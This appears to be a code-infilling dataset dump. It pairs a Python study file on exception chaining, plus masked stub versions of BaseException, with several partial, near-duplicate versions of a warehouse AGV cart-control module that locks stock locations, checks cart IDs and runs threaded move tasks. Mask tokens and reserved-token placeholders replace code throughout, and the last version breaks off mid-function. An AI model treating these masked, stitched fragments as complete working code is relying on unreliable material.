# print("context::",repr(e2.__context__))
# print("cause::",repr(e2.__cause__))
# # context:: AttributeError('1')
# # cause:: AttributeError('1')
# raise AttributeError("3") from e2
# except AttributeError as e3:
# print("context::", repr(e3.__context__))
# print("cause::", repr(e3.__cause__))
# context:: AttributeError('2')
# cause:: AttributeError('2')
# with_traceback(tb)
# This method sets tb as the new traceback for the exception and returns the exception object.
# 即设置异常 的trackback
# try:
# raise AttributeError("1")
# except AttributeError as exc:
# import sys
# tb = sys.exc_info()[2]
# raise AttributeError("2")
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 125, in <module>
# raise AttributeError("1")
# AttributeError: 1
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 129, in <module>
# raise AttributeError("2")
# AttributeError: 2
# try:
# raise AttributeError("1")
# except AttributeError as exc:
# import sys
# tb = sys.exc_info()[2]
# raise AttributeError("2").with_traceback(tb)
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 125, in <module>
# raise AttributeError("1")
# AttributeError: 1
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 129, in <module>
# raise AttributeError("2").with_traceback(tb)
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 125, in <module>
# raise AttributeError("1")
# AttributeError: 2
try:
try:
raise AttributeError("1")
except AttributeError as exc1:
raise AttributeError("2")
except AttributeError as exc2:
import sys
tb = sys.exc_info()[2]
raise AttributeError("3").with_traceback(tb)
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 173, in <module>
# raise AttributeError("3").with_traceback(tb)
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 169, in <module>
# raise AttributeError("2") from exc1
# AttributeError: 3
|
flexible
|
{
"blob_id": "3d01910ae1c163067f4a23b3cca109a7d9e193d5",
"index": 5251,
"step-1": "class BaseException(object):\n <mask token>\n\n def with_traceback(self, tb):\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs):\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs):\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs):\n pass\n\n @staticmethod\n def __new__(*args, **kwargs):\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs):\n pass\n <mask token>\n\n def __setattr__(self, *args, **kwargs):\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n <mask token>\n\n def __str__(self, *args, **kwargs):\n \"\"\" Return str(self). \"\"\"\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class BaseException(object):\n <mask token>\n\n def with_traceback(self, tb):\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs):\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs):\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs):\n pass\n\n @staticmethod\n def __new__(*args, **kwargs):\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs):\n pass\n <mask token>\n\n def __setattr__(self, *args, **kwargs):\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n\n def __setstate__(self, *args, **kwargs):\n pass\n\n def __str__(self, *args, **kwargs):\n \"\"\" Return str(self). \"\"\"\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-3": "class BaseException(object):\n <mask token>\n\n def with_traceback(self, tb):\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs):\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs):\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs):\n pass\n\n @staticmethod\n def __new__(*args, **kwargs):\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs):\n pass\n\n def __repr__(self, *args, **kwargs):\n \"\"\" Return repr(self). \"\"\"\n pass\n\n def __setattr__(self, *args, **kwargs):\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n\n def __setstate__(self, *args, **kwargs):\n pass\n\n def __str__(self, *args, **kwargs):\n \"\"\" Return str(self). \"\"\"\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-4": "class BaseException(object):\n <mask token>\n\n def with_traceback(self, tb):\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs):\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs):\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs):\n pass\n\n @staticmethod\n def __new__(*args, **kwargs):\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs):\n pass\n\n def __repr__(self, *args, **kwargs):\n \"\"\" Return repr(self). \"\"\"\n pass\n\n def __setattr__(self, *args, **kwargs):\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n\n def __setstate__(self, *args, **kwargs):\n pass\n\n def __str__(self, *args, **kwargs):\n \"\"\" Return str(self). \"\"\"\n pass\n args = property(lambda self: object(), lambda self, v: None, lambda\n self: None)\n __cause__ = property(lambda self: object(), lambda self, v: None, lambda\n self: None)\n <mask token>\n __context__ = property(lambda self: object(), lambda self, v: None, lambda\n self: None)\n <mask token>\n __suppress_context__ = property(lambda self: object(), lambda self, v:\n None, lambda self: None)\n __traceback__ = property(lambda self: object(), lambda self, v: None, \n lambda self: None)\n __dict__ = None\n\n\n<mask token>\n",
"step-5": "# -*- encoding: utf-8 -*-\n\n\n\nclass BaseException(object):\n \"\"\" Common base class for all exceptions \"\"\"\n def with_traceback(self, tb): # real signature unknown; restored from __doc__\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs): # real signature unknown\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs): # real signature unknown\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs): # real signature unknown\n pass\n\n @staticmethod # known case of __new__\n def __new__(*args, **kwargs): # real signature unknown\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs): # real signature unknown\n pass\n\n def __repr__(self, *args, **kwargs): # real signature unknown\n \"\"\" Return repr(self). \"\"\"\n pass\n\n def __setattr__(self, *args, **kwargs): # real signature unknown\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n\n def __setstate__(self, *args, **kwargs): # real signature unknown\n pass\n\n def __str__(self, *args, **kwargs): # real signature unknown\n \"\"\" Return str(self). \"\"\"\n pass\n\n args = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n\n __cause__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n \"\"\"exception cause\"\"\"\n\n __context__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n \"\"\"exception context\"\"\"\n\n __suppress_context__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n\n __traceback__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n\n\n __dict__ = None # (!) real value is \"mappingproxy({'__repr__': <slot wrapper '__repr__' of 'BaseException' objects>, '__str__': <slot wrapper '__str__' of 'BaseException' objects>, '__getattribute__': <slot wrapper '__getattribute__' of 'BaseException' objects>, '__setattr__': <slot wrapper '__setattr__' of 'BaseException' objects>, '__delattr__': <slot wrapper '__delattr__' of 'BaseException' objects>, '__init__': <slot wrapper '__init__' of 'BaseException' objects>, '__new__': <built-in method __new__ of type object at 0x00007FFC49400810>, '__reduce__': <method '__reduce__' of 'BaseException' objects>, '__setstate__': <method '__setstate__' of 'BaseException' objects>, 'with_traceback': <method 'with_traceback' of 'BaseException' objects>, '__suppress_context__': <member '__suppress_context__' of 'BaseException' objects>, '__dict__': <attribute '__dict__' of 'BaseException' objects>, 'args': <attribute 'args' of 'BaseException' objects>, '__traceback__': <attribute '__traceback__' of 'BaseException' objects>, '__context__': <attribute '__context__' of 'BaseException' objects>, '__cause__': <attribute '__cause__' of 'BaseException' objects>, '__doc__': 'Common base class for all exceptions'})\"\n\n\n\n# __context__ :当在except子异常或finally子异常中引发(或重新引发)异常时,(既有多个try)\n# __context__ 被自动设置为捕获的最后一个异常;如果没有处理新的异常,最终显示的回溯将包括最初的异常和最终的异常\n\n\n# try:\n# try:\n# raise ValueError(\"ValueError\")\n# except ValueError as first:\n# raise TypeError(\"TypeError\") from first\n# except TypeError as second:\n# print(\"The exception was\", repr(second))\n# print(\"Its __context__ was\", repr(second.__context__))\n# print(\"Its __cause__ was\", repr(second.__cause__))\n#\n# The exception was TypeError('TypeError')\n# Its __context__ was ValueError('ValueError')\n# Its __cause__ was ValueError('ValueError')\n\n\n## 必须要有raise from\n## context 为raise from 的 excepton\n\n# try:\n# try:\n# raise AttributeError(\"1\")\n# except Exception as e1:\n# raise AttributeError from e1\n# except AttributeError as exc_1:\n# print(\"context::\",repr(exc_1.__context__))\n# print(\"cause::\",repr(exc_1.__cause__))\n\n # AttributeError 是raise from e1 即context,cause为 e1\n # print(\"context::\",repr(exc_1.__context__))\n # print(\"cause::\",repr(exc_1.__cause__))\n\n# try:\n# try:\n# try:\n# raise AttributeError(\"1\")\n# except Exception as e1:\n# raise AttributeError(\"2\") from e1\n# except AttributeError as e2:\n# print(\"context::\",repr(e2.__context__))\n# print(\"cause::\",repr(e2.__cause__))\n# # context:: AttributeError('1')\n# # cause:: AttributeError('1')\n# raise AttributeError(\"3\") from e2\n# except AttributeError as e3:\n# print(\"context::\", repr(e3.__context__))\n# print(\"cause::\", repr(e3.__cause__))\n # context:: AttributeError('2')\n # cause:: AttributeError('2')\n\n\n# with_traceback(tb)\n\n# This method sets tb as the new traceback for the exception and returns the exception object.\n# 即设置异常 的trackback\n\n# try:\n# raise AttributeError(\"1\")\n# except AttributeError as exc:\n# import sys\n# tb = sys.exc_info()[2]\n# raise AttributeError(\"2\")\n\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 125, in <module>\n# raise AttributeError(\"1\")\n# AttributeError: 1\n#\n# During handling of the above exception, another exception occurred:\n#\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 129, in <module>\n# raise AttributeError(\"2\")\n# AttributeError: 2\n\n\n# try:\n# raise AttributeError(\"1\")\n# except AttributeError as exc:\n# import sys\n# tb = sys.exc_info()[2]\n# raise AttributeError(\"2\").with_traceback(tb)\n\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 125, in <module>\n# raise AttributeError(\"1\")\n# AttributeError: 1\n#\n# During handling of the above exception, another exception occurred:\n#\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 129, in <module>\n# raise AttributeError(\"2\").with_traceback(tb)\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 125, in <module>\n# raise AttributeError(\"1\")\n# AttributeError: 2\n\ntry:\n try:\n raise AttributeError(\"1\")\n except AttributeError as exc1:\n raise AttributeError(\"2\")\nexcept AttributeError as exc2:\n import sys\n tb = sys.exc_info()[2]\n raise AttributeError(\"3\").with_traceback(tb)\n\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 173, in <module>\n# raise AttributeError(\"3\").with_traceback(tb)\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 169, in <module>\n# raise AttributeError(\"2\") from exc1\n# AttributeError: 3\n",
"step-ids": [
9,
10,
11,
12,
15
]
}
|
[
9,
10,
11,
12,
15
] |
<|reserved_special_token_0|>
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
<|reserved_special_token_0|>
def getStockA(loc):
if loc[0:6] != 'stockA':
return None
m = re.search('stockA_row(\\d+)_col(\\d+).*', loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row % 2 != 1:
row -= 1
return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index, agvId, loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:
unlockStockA(agvId, loc)
log.warning('delete timeout locked', index)
def lockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index, agvId, loc)
log.warning(agvId, loc, 'is locked, wait for unlock')
for i in range(60 * 5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId, loc, 'wait for unlock success')
global g_lock
log.debug(agvId, 'lock', loc, index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId, 'unlock', loc, index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = 'point.cfg'
if filePath:
fileName = filePath + '/' + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId, scanId):
scanId = scanId.strip()
def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
json_codec.dump_file(pp, g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return 'unknown'
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))
raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart
(scanId))
else:
g_carts[cartId] = scanId
saveCart()
def _run(func, args, callback, obj):
def threadFunc(func, args, callback, obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj['result'] = -1
obj['resultDesc'] = str(e)
log.exception('agvCtrl:', e)
if 'agv' in obj:
agvId = obj['agv']
log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj, agvId):
obj['agv'] = agvId
obj['result'] = 0
obj['resultDesc'] = 'success'
<|reserved_special_token_0|>
def apply(locId):
locId = getOriginPoint(locId)
return api.apply(locId + '.1')
def call(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
locId = getOriginPoint(locId)
try:
_run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
<|reserved_special_token_0|>
def moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):
_initObj(obj, agvId)
assert api.isCartLoc(cartId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=
finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
<|reserved_special_token_0|>
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception('freeAgv', e)
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
<|reserved_special_token_0|>
def testgetPoint():
resulta = getPoint('StockA_row7_col4')
assert resulta == 'begin_1'
resultb = getPoint('StockA_row8_col4')
assert resultb == 'begin_2'
def testgetOrginPoint():
resulta = getOriginPoint('begin_1')
assert resulta == 'StockA_row7_col4'
resultb = getOriginPoint('begin_2')
assert resultb == 'StockA_row8_col4'
resultc = getOriginPoint('hhahahaa')
assert resultc == 'hhahahaa'
<|reserved_special_token_0|>
def testcheckCart():
global g_carts
g_carts = None
checkCart('CART9001', '591')
checkCart('CART9002', '592')
gg = json_codec.load_file('cart.cfg')
assert 'CART9001' in gg
assert 'CART9002' in gg
assert gg['CART9001'] == '591'
assert gg['CART9002'] == '592'
checkCart('CART9002', '592')
checkCart('CART9001', '591')
try:
checkCart('CART9002', '591')
assert 0
except Exception as e:
s = str(e)
assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1
<|reserved_special_token_0|>
def func2(stock1, stock2):
print('-------------------- start thread ------------------------',
stock1, stock2)
time.sleep(1)
cartId = 'CART9009'
for i in range(20):
print('current loop is - ', i.__str__())
move_cart(cartId, stock1, stock2)
move_cart(cartId, stock2, stock1)
print('current loop end - ', i.__str__())
print('=======================================')
print('finish func2')
print('=======================================')
def func3(times, starts, seats):
current = starts
cartId = 'CART9009'
time.sleep(1)
for loop in range(0, times - 1):
tip1 = 'currentLoop is ' + loop.__str__(
) + ' currentStart is ' + current
print(tip1)
for i in range(0, len(seats)):
next = str(seats[i])
tip2 = ('currentLoop is ' + loop.__str__() +
'currentOrigin is ' + current + 'currentNext is ' + next +
' seatIndex is ' + i.__str__())
print(tip2)
print('excuting')
move_cart(cartId, current, next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
seat = currentJson['seat']
loop = int(currentJson['loop'])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop,
start, seats])
durabilityTestTask1.start()
result = True
return result
<|reserved_special_token_0|>
def testPageUnloockAll():
api.unlockAll()
<|reserved_special_token_0|>
def test1():
Init()
durabilityTestTask1 = threading.Thread(target=func3, args=[20,
'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])
durabilityTestTask1.start()
durabilityTestTask2 = threading.Thread(target=func3, args=[20,
'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])
durabilityTestTask3 = threading.Thread(target=func3, args=[20,
'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])
durabilityTestTask4 = threading.Thread(target=func3, args=[20,
'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])
durabilityTestTask1.join()
print('===============ALL FINISH ========================')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
<|reserved_special_token_0|>
def getStockA(loc):
if loc[0:6] != 'stockA':
return None
m = re.search('stockA_row(\\d+)_col(\\d+).*', loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row % 2 != 1:
row -= 1
return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index, agvId, loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:
unlockStockA(agvId, loc)
log.warning('delete timeout locked', index)
def lockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index, agvId, loc)
log.warning(agvId, loc, 'is locked, wait for unlock')
for i in range(60 * 5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId, loc, 'wait for unlock success')
global g_lock
log.debug(agvId, 'lock', loc, index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId, 'unlock', loc, index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = 'point.cfg'
if filePath:
fileName = filePath + '/' + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId, scanId):
scanId = scanId.strip()
def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
json_codec.dump_file(pp, g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return 'unknown'
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))
raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart
(scanId))
else:
g_carts[cartId] = scanId
saveCart()
def _run(func, args, callback, obj):
def threadFunc(func, args, callback, obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj['result'] = -1
obj['resultDesc'] = str(e)
log.exception('agvCtrl:', e)
if 'agv' in obj:
agvId = obj['agv']
log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj, agvId):
obj['agv'] = agvId
obj['result'] = 0
obj['resultDesc'] = 'success'
<|reserved_special_token_0|>
def apply(locId):
locId = getOriginPoint(locId)
return api.apply(locId + '.1')
def call(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
locId = getOriginPoint(locId)
try:
_run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
def _moveCart(agvId, srcLoc, locId, cartId):
try:
c = api.mission(agvId, 2)
if c:
checkCart(cartId, c)
api.move(agvId, srcLoc + '.2')
except Exception as e:
pass
finally:
unlockStockA(agvId, srcLoc)
loc, type = api.getMissionType('get', '', srcLoc)
api.mission(agvId, type)
loc, type = api.getMissionType('put', srcLoc, locId)
api.move(agvId, loc + '.3')
api.mission(agvId, type)
lockStockA(agvId, locId)
try:
api.move(agvId, locId + '.4')
api.mission(agvId, 5)
api.move(agvId, locId + '.5')
finally:
unlockStockA(agvId, locId)
freeAgv(agvId)
def moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):
_initObj(obj, agvId)
assert api.isCartLoc(cartId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=
finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
def move(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
try:
locId = getOriginPoint(locId)
_run(func=api.move, args=(agvId, locId), callback=finishCallback,
obj=obj)
except Exception as e:
freeAgv(agvId)
raise e
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception('freeAgv', e)
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
<|reserved_special_token_0|>
def testgetPoint():
resulta = getPoint('StockA_row7_col4')
assert resulta == 'begin_1'
resultb = getPoint('StockA_row8_col4')
assert resultb == 'begin_2'
def testgetOrginPoint():
resulta = getOriginPoint('begin_1')
assert resulta == 'StockA_row7_col4'
resultb = getOriginPoint('begin_2')
assert resultb == 'StockA_row8_col4'
resultc = getOriginPoint('hhahahaa')
assert resultc == 'hhahahaa'
def testgetStockA():
assert getStockA('stockA_row10_col3') == 9003
assert getStockA('stockA_row10_col4') == 9004
assert getStockA('stockA_row1_col1') == 1001
assert getStockA('stockA_row2_col2') == 1002
assert getStockA('stockA_row3_col2') == 3002
assert getStockA('stockA_row4_col2') == 3002
assert getStockA('stockA_row4_col2.1') == 3002
assert getStockA('stockB_row4_col2.1') == None
assert getStockA('begin_1') == None
assert getStockA('seat_1') == None
def testcheckCart():
global g_carts
g_carts = None
checkCart('CART9001', '591')
checkCart('CART9002', '592')
gg = json_codec.load_file('cart.cfg')
assert 'CART9001' in gg
assert 'CART9002' in gg
assert gg['CART9001'] == '591'
assert gg['CART9002'] == '592'
checkCart('CART9002', '592')
checkCart('CART9001', '591')
try:
checkCart('CART9002', '591')
assert 0
except Exception as e:
s = str(e)
assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1
<|reserved_special_token_0|>
def func2(stock1, stock2):
print('-------------------- start thread ------------------------',
stock1, stock2)
time.sleep(1)
cartId = 'CART9009'
for i in range(20):
print('current loop is - ', i.__str__())
move_cart(cartId, stock1, stock2)
move_cart(cartId, stock2, stock1)
print('current loop end - ', i.__str__())
print('=======================================')
print('finish func2')
print('=======================================')
def func3(times, starts, seats):
current = starts
cartId = 'CART9009'
time.sleep(1)
for loop in range(0, times - 1):
tip1 = 'currentLoop is ' + loop.__str__(
) + ' currentStart is ' + current
print(tip1)
for i in range(0, len(seats)):
next = str(seats[i])
tip2 = ('currentLoop is ' + loop.__str__() +
'currentOrigin is ' + current + 'currentNext is ' + next +
' seatIndex is ' + i.__str__())
print(tip2)
print('excuting')
move_cart(cartId, current, next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
seat = currentJson['seat']
loop = int(currentJson['loop'])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop,
start, seats])
durabilityTestTask1.start()
result = True
return result
<|reserved_special_token_0|>
def testPageUnloockAll():
api.unlockAll()
<|reserved_special_token_0|>
def test1():
Init()
durabilityTestTask1 = threading.Thread(target=func3, args=[20,
'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])
durabilityTestTask1.start()
durabilityTestTask2 = threading.Thread(target=func3, args=[20,
'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])
durabilityTestTask3 = threading.Thread(target=func3, args=[20,
'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])
durabilityTestTask4 = threading.Thread(target=func3, args=[20,
'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])
durabilityTestTask1.join()
print('===============ALL FINISH ========================')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
<|reserved_special_token_0|>
def getStockA(loc):
if loc[0:6] != 'stockA':
return None
m = re.search('stockA_row(\\d+)_col(\\d+).*', loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row % 2 != 1:
row -= 1
return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index, agvId, loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:
unlockStockA(agvId, loc)
log.warning('delete timeout locked', index)
def lockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index, agvId, loc)
log.warning(agvId, loc, 'is locked, wait for unlock')
for i in range(60 * 5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId, loc, 'wait for unlock success')
global g_lock
log.debug(agvId, 'lock', loc, index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId, 'unlock', loc, index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = 'point.cfg'
if filePath:
fileName = filePath + '/' + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId, scanId):
scanId = scanId.strip()
